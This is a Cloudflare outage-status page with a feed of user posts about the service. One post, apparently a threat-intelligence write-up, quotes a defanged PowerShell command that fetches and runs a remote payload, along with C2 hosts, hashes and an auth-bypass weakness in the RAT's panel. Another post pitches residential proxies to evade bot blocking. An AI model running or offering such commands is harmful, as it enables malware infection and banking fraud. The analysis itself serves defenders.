Cloudflare status: hosting issues and outage reports

Problems in the last 24 hours

The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.

Most Reported Problems

The following are the most recent problems reported by Cloudflare users through our website.

• Domains (35%)
• Cloud Services (30%)
• Hosting (19%)
• Web Tools (11%)
• E-mail (5%)

Live Outage Map

The most recent Cloudflare outage reports came from the following cities:

City	Problem Type	Report Time
Angers	Cloud Services	8 days ago
London	Domains	10 days ago
Noida	Hosting	23 days ago
Jewar	E-mail	24 days ago
Braga	Web Tools	24 days ago
Noida	Cloud Services	24 days ago

Full Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

• 
  Calvin (@Calvin24seven) reported 6 minutes ago

  @EddCoates Honeypots, cloudflare, fingerprinting, not giving so much value away for free would help. Site is great btw

• 
  HAB1B0 German Raffleking 🇩🇪🇹🇷👑{🦅} (@Habiboooo4) reported 7 minutes ago

  @Signulous Your cloudflare is down

• 
  Dety (@Dety0) reported 8 minutes ago

  ServiceDesk tier list S: Cloudflare is down A: Password Reset, PC Crashing B: Data Backups C: Phishing Mails D: New User Onboarding, Meeting Room Setup F: Outlook Classic, PRINTERS

• 
  Devine dev (@Andrew652263) reported 14 minutes ago

  @elshad_ff @Teknium Had similar websocket issues before. One thing that helped was testing the same dashboard through Pinggy to confirm if Cloudflare was the bottleneck.

• 
  seanvfacer (@seanvfacer) reported 14 minutes ago

  Bots just beat humans on the internet. For the first time in history. Not coming. Already happened. Cloudflare — the company running 1 in 5 websites on earth — watched the moment it tipped. The old internet was built for people. The new one's built for agents that don't browse, don't linger, don't even see your sign. So if you're building anything in 2026 — your customer might not be human anymore.

• 
  DownWithBigBrother (@DWBB1984) reported 15 minutes ago

  @ultrasxiv Fair on bandwidth being a real cost, but the 2GB figure is a long way out. Cheapest DO droplet includes 500GB+ outbound, Hetzner 20TB+. At 600-700GB household use you’re a pound or two over on DO, zero on Hetzner. Stays around the base £4-5 for most, not £300. And “un-bannable” was the precise word, not hyperbole. A commercial VPN is bannable because it’s a named brand with known IPs, a company that can be pressured or blocked. That’s the weakness. Self-hosting removes the target entirely. There’s no technical category called “a VPS used as a VPN.” It’s a rented server running standard encryption (WireGuard, IPsec), the same protocols carrying every bank settlement, ATM link and corporate tunnel on earth. To ban it you’d have to block those protocols (killing Visa, every corporate VPN, all remote work) or blacklist the datacentre IP ranges (AWS, Hetzner, OVH) that host the actual internet: payment gateways, banking backends, Stripe, Cloudflare, gov services. You can’t separate “server someone might tunnel through” from “server running the shop you’re buying from.” The second and third-order effects would cripple e-commerce, open banking and logistics, all riding the same cloud backbone. That’s the sovereignty point. You can ban a brand. You can’t ban the capability of renting a server and encrypting your own traffic, not without taking modern commerce down with it.

• 
  63green (@63green) reported 17 minutes ago

  So @Cloudflare works overtime to destroy thei reputation by sending emails despite every notification turned off, and I’m willing to grant their request to never, ever trust this criminal company, and never use them. Any company willing to **** you by email will **** your data.

• 
  Japan Anime News (JAN) (@JapanAnimeNews_) reported 23 minutes ago

  A change to our Cloudflare settings appears to have caused access issues for some users. We apologize for the inconvenience this may be causing. Please bear with us for a few days while we work to resolve the issue. 🙏

• 
  José Batista (@JoseBatista4321) reported 24 minutes ago

  @EddCoates Sir, as an amateur game developer I find your website very interesting. Just use Cloudflare, I guess it will do. But if not, you can look out for something to block IPs. If the problem is real crawlers, you can block them by their user-agent.

• 
  Special Situations 🌐 Research Newsletter (Jay) (@SpecialSitsNews) reported 26 minutes ago

  New Activist Name: Shares of $MTN are trading up 13% at $141.65 on Thursday, rebounding sharply from their 52-week low of $118.51 hit earlier this year, as the Semafor scoop circulates across trading desks. The intraday move lifts the company's market cap to roughly $5.05 billion. According to Semafor, Vail's bankers are tasked with assessing vulnerabilities across a broad front: labor unrest, weather-related demand swings, and the specific pressure campaign being waged by Prince, who co-founded Cloudflare (NET). Prince told a local Colorado publication in June 2026 that he is willing to invest $500 million in Park City Mountain Resort and admitted he has already fielded calls from activist investors probing Vail's weaknesses. His preferred blueprint would see Vail pivot to an asset-light model, acting as a partnership facilitator rather than a direct mountain owner, a structure that would almost certainly require carving up the company's core real-estate holdings. The timing is awkward for management. Vail reported fiscal Q3 2026 earnings per share of $8.81, missing the consensus estimate of $9.09 by 3.1%, while revenue of $1.21 billion came in roughly $10 million below forecasts. The company subsequently cut its fiscal 2026 net income guidance to a range of $128 million to $162 million and trimmed Resort Reported EBITDA guidance to $735$755 million, down from the prior range of $745$775 million. Net debt has climbed to $2.65 billion from $2.24 billion a year earlier, pushing net leverage to 3.5x trailing twelve-month EBITDA as of April 30, 2026, while cash on hand stood at $371.4 million. Into that environment, the board moved in May 2025 to recall Rob Katz, the executive who originally built Vail into a multi-mountain empire, ousting his hand-picked successor in the process. Katz has since focused on the operational grievances that drove customer dissatisfaction, particularly lift-line congestion and chronic labor shortages, introducing products like Epic Friend Tickets and discounted super-advanced lift tickets that are showing early traction. The move signals that Vail's board views operational credibility as its first line of defense against any activist pitch centered on mismanagement. Management also has a financial lever to highlight in any proxy fight. The company pays a quarterly cash dividend of $2.22 per share, with the next payment scheduled for July 9, 2026, equating to an annualized yield of roughly 6.6% at current prices. That yield argument, steady cash returns while the turnaround plays out, is a standard defensive talking point, though it carries less weight when leverage is rising and guidance is being cut. Investors will get a clearer read on whether Katz's operational fixes are gaining traction when Vail reports fiscal Q4 2026 results, tentatively scheduled for September 24, 2026. The setup is challenging: consensus EPS for that quarter stands at -$5.05, with eight analyst downward revisions in the past 90 days and no upward revisions, reflecting the structural headwinds Prince and any allied activist would likely exploit.

• 
  Hunter Bertoson (@BertosonHunter) reported 26 minutes ago

  @jamesqquick Watched the network tab, reverse-engineered an undocumented API, and turned it into a Cloudflare Worker that catches failed attendance syncs and emails an alert every night. Workers + cron is unreasonably good for this kind of thing.

• 
  brale (@brale_xyz) reported 31 minutes ago

  his is not just a blockchain story either. @NIST finalized three post-quantum standards in 2024. @Cloudflare says more than two-thirds of TLS traffic through its network now uses post-quantum key exchange. The migration has already started.

• 
  Jasper Disney (@jasper_disney) reported 34 minutes ago

  As an unsuccessful app builder, I only need to pay 5 dollars to Cloudflare each month. Life is not that bad.

• 
  ShadeNoah (@ShadeNoah) reported 38 minutes ago

  @EddCoates Yeah that sucks... Has been an issue forever, though. Nobody gives a **** about robots.txt... No wonder CDNs like Cloudflare pretty much have over half the internet on their servers by now. See if you can rate-limit every request, or bite the bullet and use a CDN. Godspeed, mate.

• 
  Jose (@SolutionsCay) reported 39 minutes ago

  Two changes to how I work with agents: 1. GitHub App so the agents manage issues directly. Keeps the repo clear of throwaway spec and todo files. 2. EmDash (Cloudflare's serverless WordPress successor) for internal docs. Runs on D1, just SQLite under the hood, so I can export the content and move it anywhere. No more docs sprawl.

• 
  Stefan Mincher (@StefanMincher) reported 44 minutes ago

  @betangel any issues currently? I bought keys on 16th June, I haven’t received the email with them on. Can’t log support via the website as there’s a cloudflare error.

• 
  Elizabeth (@Sounsmooth) reported 48 minutes ago

  @FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.

• 
  oops (@fataloops) reported 51 minutes ago

  @EddCoates I have a (conspiracy) theory about this- Cloudflare is the one doing the scraping, millions of requests Your only option is to use cloudflare or take down the site

• 
  Michael Williamson (@BeachTruck) reported 52 minutes ago

  @EddCoates There's always Cloudflare. It kind of sucks having to give up SSL encrypted content to a 3rd party (they re-issue another SSL connection), but sucks less than getting ddos's by these stupid clanker suckbots.

• 
  Mark Dembo (@darkmembo) reported 52 minutes ago

  i am so proud working at @Cloudflare. i have never experienced anything like it. people do whatever it takes to make customers happy. shipping fixes, improvements or entirely new services (!) timelines are hours or days for small things. weeks for bigger ones.

• 
  bigdatachads (@bigdatachads) reported 54 minutes ago

  I've been building AI phone agents on @Cloudflare for a while now. v1. a Python container, fighting for every millisecond. v2. no container, the whole call on the edge. that was the real work. now that I have the stack down, I spent last weekend messing around. this is v3, a cartoon you talk to that remembers you and gets heckled by a second AI. all on Cloudflare primitives. three teardowns, first one tomorrow. follow along. @CloudflareDev

• 
  Alon M. (@Alon_iploop) reported 55 minutes ago

  @BenjaminFlatz Stealth helps, but most Cloudflare failures are environment issues: IP reputation, geo, sticky sessions, and consistent browser state. IPLoop provides the residential network layer so Playwright/Scrapy stacks don’t fail just because the traffic looks wrong.

• 
  Luca Steeb (@steebchen) reported 56 minutes ago

  @baanish @fayazara it's actually not true, you can use the CloudFlare AI gateway by setting it up in the dashboard and you'll get an URL which works with any SDK or library. however, personally I recommend to use @llmgateway as we support the full catalog of models and DevPass coding plan for 3x usage

• 
  dmsimon (@dmsimon) reported 56 minutes ago

  @EddCoates I had the same problem and moved to @Cloudflare and am using pages and workers. Pages is free on a free account for a ridiculous amount of volume. Keep you host running the dB and move the front to CF. I also think it is much better than gh pages.

• 
  JustAnotherUser_4 (@JAU_4) reported 58 minutes ago

  @EddCoates Cloudflare firewall, thank me later. I blocked entire countries. Solved so many problems.

• 
  DFIR Radar (@DFIR_Radar) reported 58 minutes ago

  AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

• 
  Shantanu Landore (@ShantanuVL) reported 58 minutes ago

  @itsasmolsush Oof well my non tech tech company has everything set up over cloudflare so we need to log in with MFA once a day... and the prompt to login comes at the worst point of the day everyday so

• 
  SpikeViper (@spikeviper) reported 1 hour ago

  I am once again asking @Cloudflare for a response on why their support is radio silent on what is now a shady billing situation

• 
  Ciccio Diddo 🐧🇪🇺🚽 (@CiccioDiddo) reported 1 hour ago

  @EddCoates another interesting cloudflare function is AI labirynt ... it create a ton of fake content filled with nofollow links generated by some **** IA... so the scraper spends a ton of resources to traverse all links then, if not enough start to ban by AS number instead of single IP

• 
  Michael Ramos (@backnotprop) reported 1 hour ago

  Every "ADE" is going to be pushed into one of either of (some might try to do all): - Linear competitor - Notion competitor - diffxyz/Ai-review competitor and away from "a harness for harnesses" - and/or misstep into remote execution (this requires all in customer bets. Like you either all go all in into the linear model or you do not - I can't imagine this scaling). But there's a much stronger durable layer nobody's really hitting at other than the infrastructure providers - context/artifacts has a lot of exciting potential. You can see it with cursor origin, cloudflare artifacts, code[dot]storage are pointing at. A lot of innovation to be had here & on top of - beyond "hey, share your HTML with me" There's still room for middle layer execution innovation, and it might smell like memory, but nobody's doing memory right.